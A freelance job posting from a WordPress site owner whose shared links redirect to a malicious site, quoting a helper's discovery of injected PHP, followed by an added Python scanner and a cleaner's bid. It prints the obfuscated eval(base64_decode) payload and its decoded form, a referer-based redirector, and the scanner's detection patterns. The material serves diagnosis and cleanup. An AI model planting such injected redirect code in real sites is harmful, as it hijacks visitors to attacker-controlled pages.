When I blog on my site [login to view URL] (or autopost via the "Social Networks Auto Poster" widget), it posts to my Facebook. The shortened code (e.g. [login to view URL]) leads to a malicious site, I believe, e.g. [login to view URL] (oddly, on mobile devices, it correctly goes to my blog).
I am not sure if this is the cause; however, a previous person I hired noticed some code that shouldn't be there (in his words). Code is below.
I would like to have the problem resolved, and also know how to prevent future such events from taking place. Below is what I've been told was found:
"I believe your website might have been hacked. There is this type of code (see below) in several of the PHP files, which is not normally in the WordPress PHP files… It’s been my experience that when there is something like this, the website has been hacked. The best I could do is remove all this code, but without fixing the security hole(s) the hackers will likely just put this code back in there. I am just letting you know, so that you can address the issue before it gets worse.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9xcnVlLnFwb2UuY29tLyIpOwpleGl0KCk7DQp9Cn0NCn0NCn0NCn0="));
I base64-decoded that code and it comes out to this (see below), but it basically looks like it might be redirecting people to [login to view URL] (I didn’t go to this website because it is likely malicious) when they are referred to your website by search engines / Facebook / MySpace / etc.
error_reporting(0); // hide any PHP errors the injected code might raise
$qazplm=headers_sent();
if (!$qazplm){ // only act while HTTP headers can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
            // visitor arrived from a search engine, social site or link shortener
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"[login to view URL]") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: [login to view URL]"); // send the visitor to the third-party site
                    exit();
                }
            }
        }
    }
}
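One way to locate this kind of injection across a site's PHP files, as an added example that is not part of the original post and not WordPress code: it finds eval(base64_decode(...)) wrappers like the one quoted above, decodes them without executing anything, and flags payloads that combine a referer check with a Location redirect. The function names and the sample payload (with its example.invalid URL) are constructed for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

# eval(base64_decode("...")) with either quote style and optional whitespace
WRAPPER = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
# Traits of the decoded redirector quoted in the post
INDICATORS = {
    "referer_check": re.compile(r"HTTP_REFERER"),
    "user_agent_check": re.compile(r"HTTP_USER_AGENT"),
    "location_redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}

def scan_text(text):
    """Return one finding per eval(base64_decode(...)) wrapper in text."""
    findings = []
    for m in WRAPPER.finditer(text):
        try:
            decoded = base64.b64decode(m.group(2)).decode("latin-1")
        except (binascii.Error, ValueError):
            decoded = ""  # not valid base64; the wrapper is still reported
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(decoded))
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "indicators": hits,
            "redirector": {"referer_check", "location_redirect"} <= set(hits),
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_text(path.read_text(encoding="latin-1", errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed sample (not from the page): a harmless stand-in payload
SAMPLE_PAYLOAD = (
    b'error_reporting(0);$r=$_SERVER["HTTP_REFERER"];'
    b'if(stristr($r,"search")){header("Location: http://redirect.example.invalid/");exit();}'
)
SAMPLE_PHP = '<?php\n/* theme header */\neval(base64_decode("%s"));\n' % base64.b64encode(SAMPLE_PAYLOAD).decode()
```

Calling scan_tree on a copy of the WordPress directory lists each affected file with the line of the wrapper, which also gives a baseline to re-check after cleanup.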
I am an experienced (mostly WordPress) infection cleaner. I will clear your website of all malicious inserts and apply some patches I know for bugs that make WordPress vulnerable to injection (usually inside plugins). Take my bid and consider it done. Thank you, //liviu d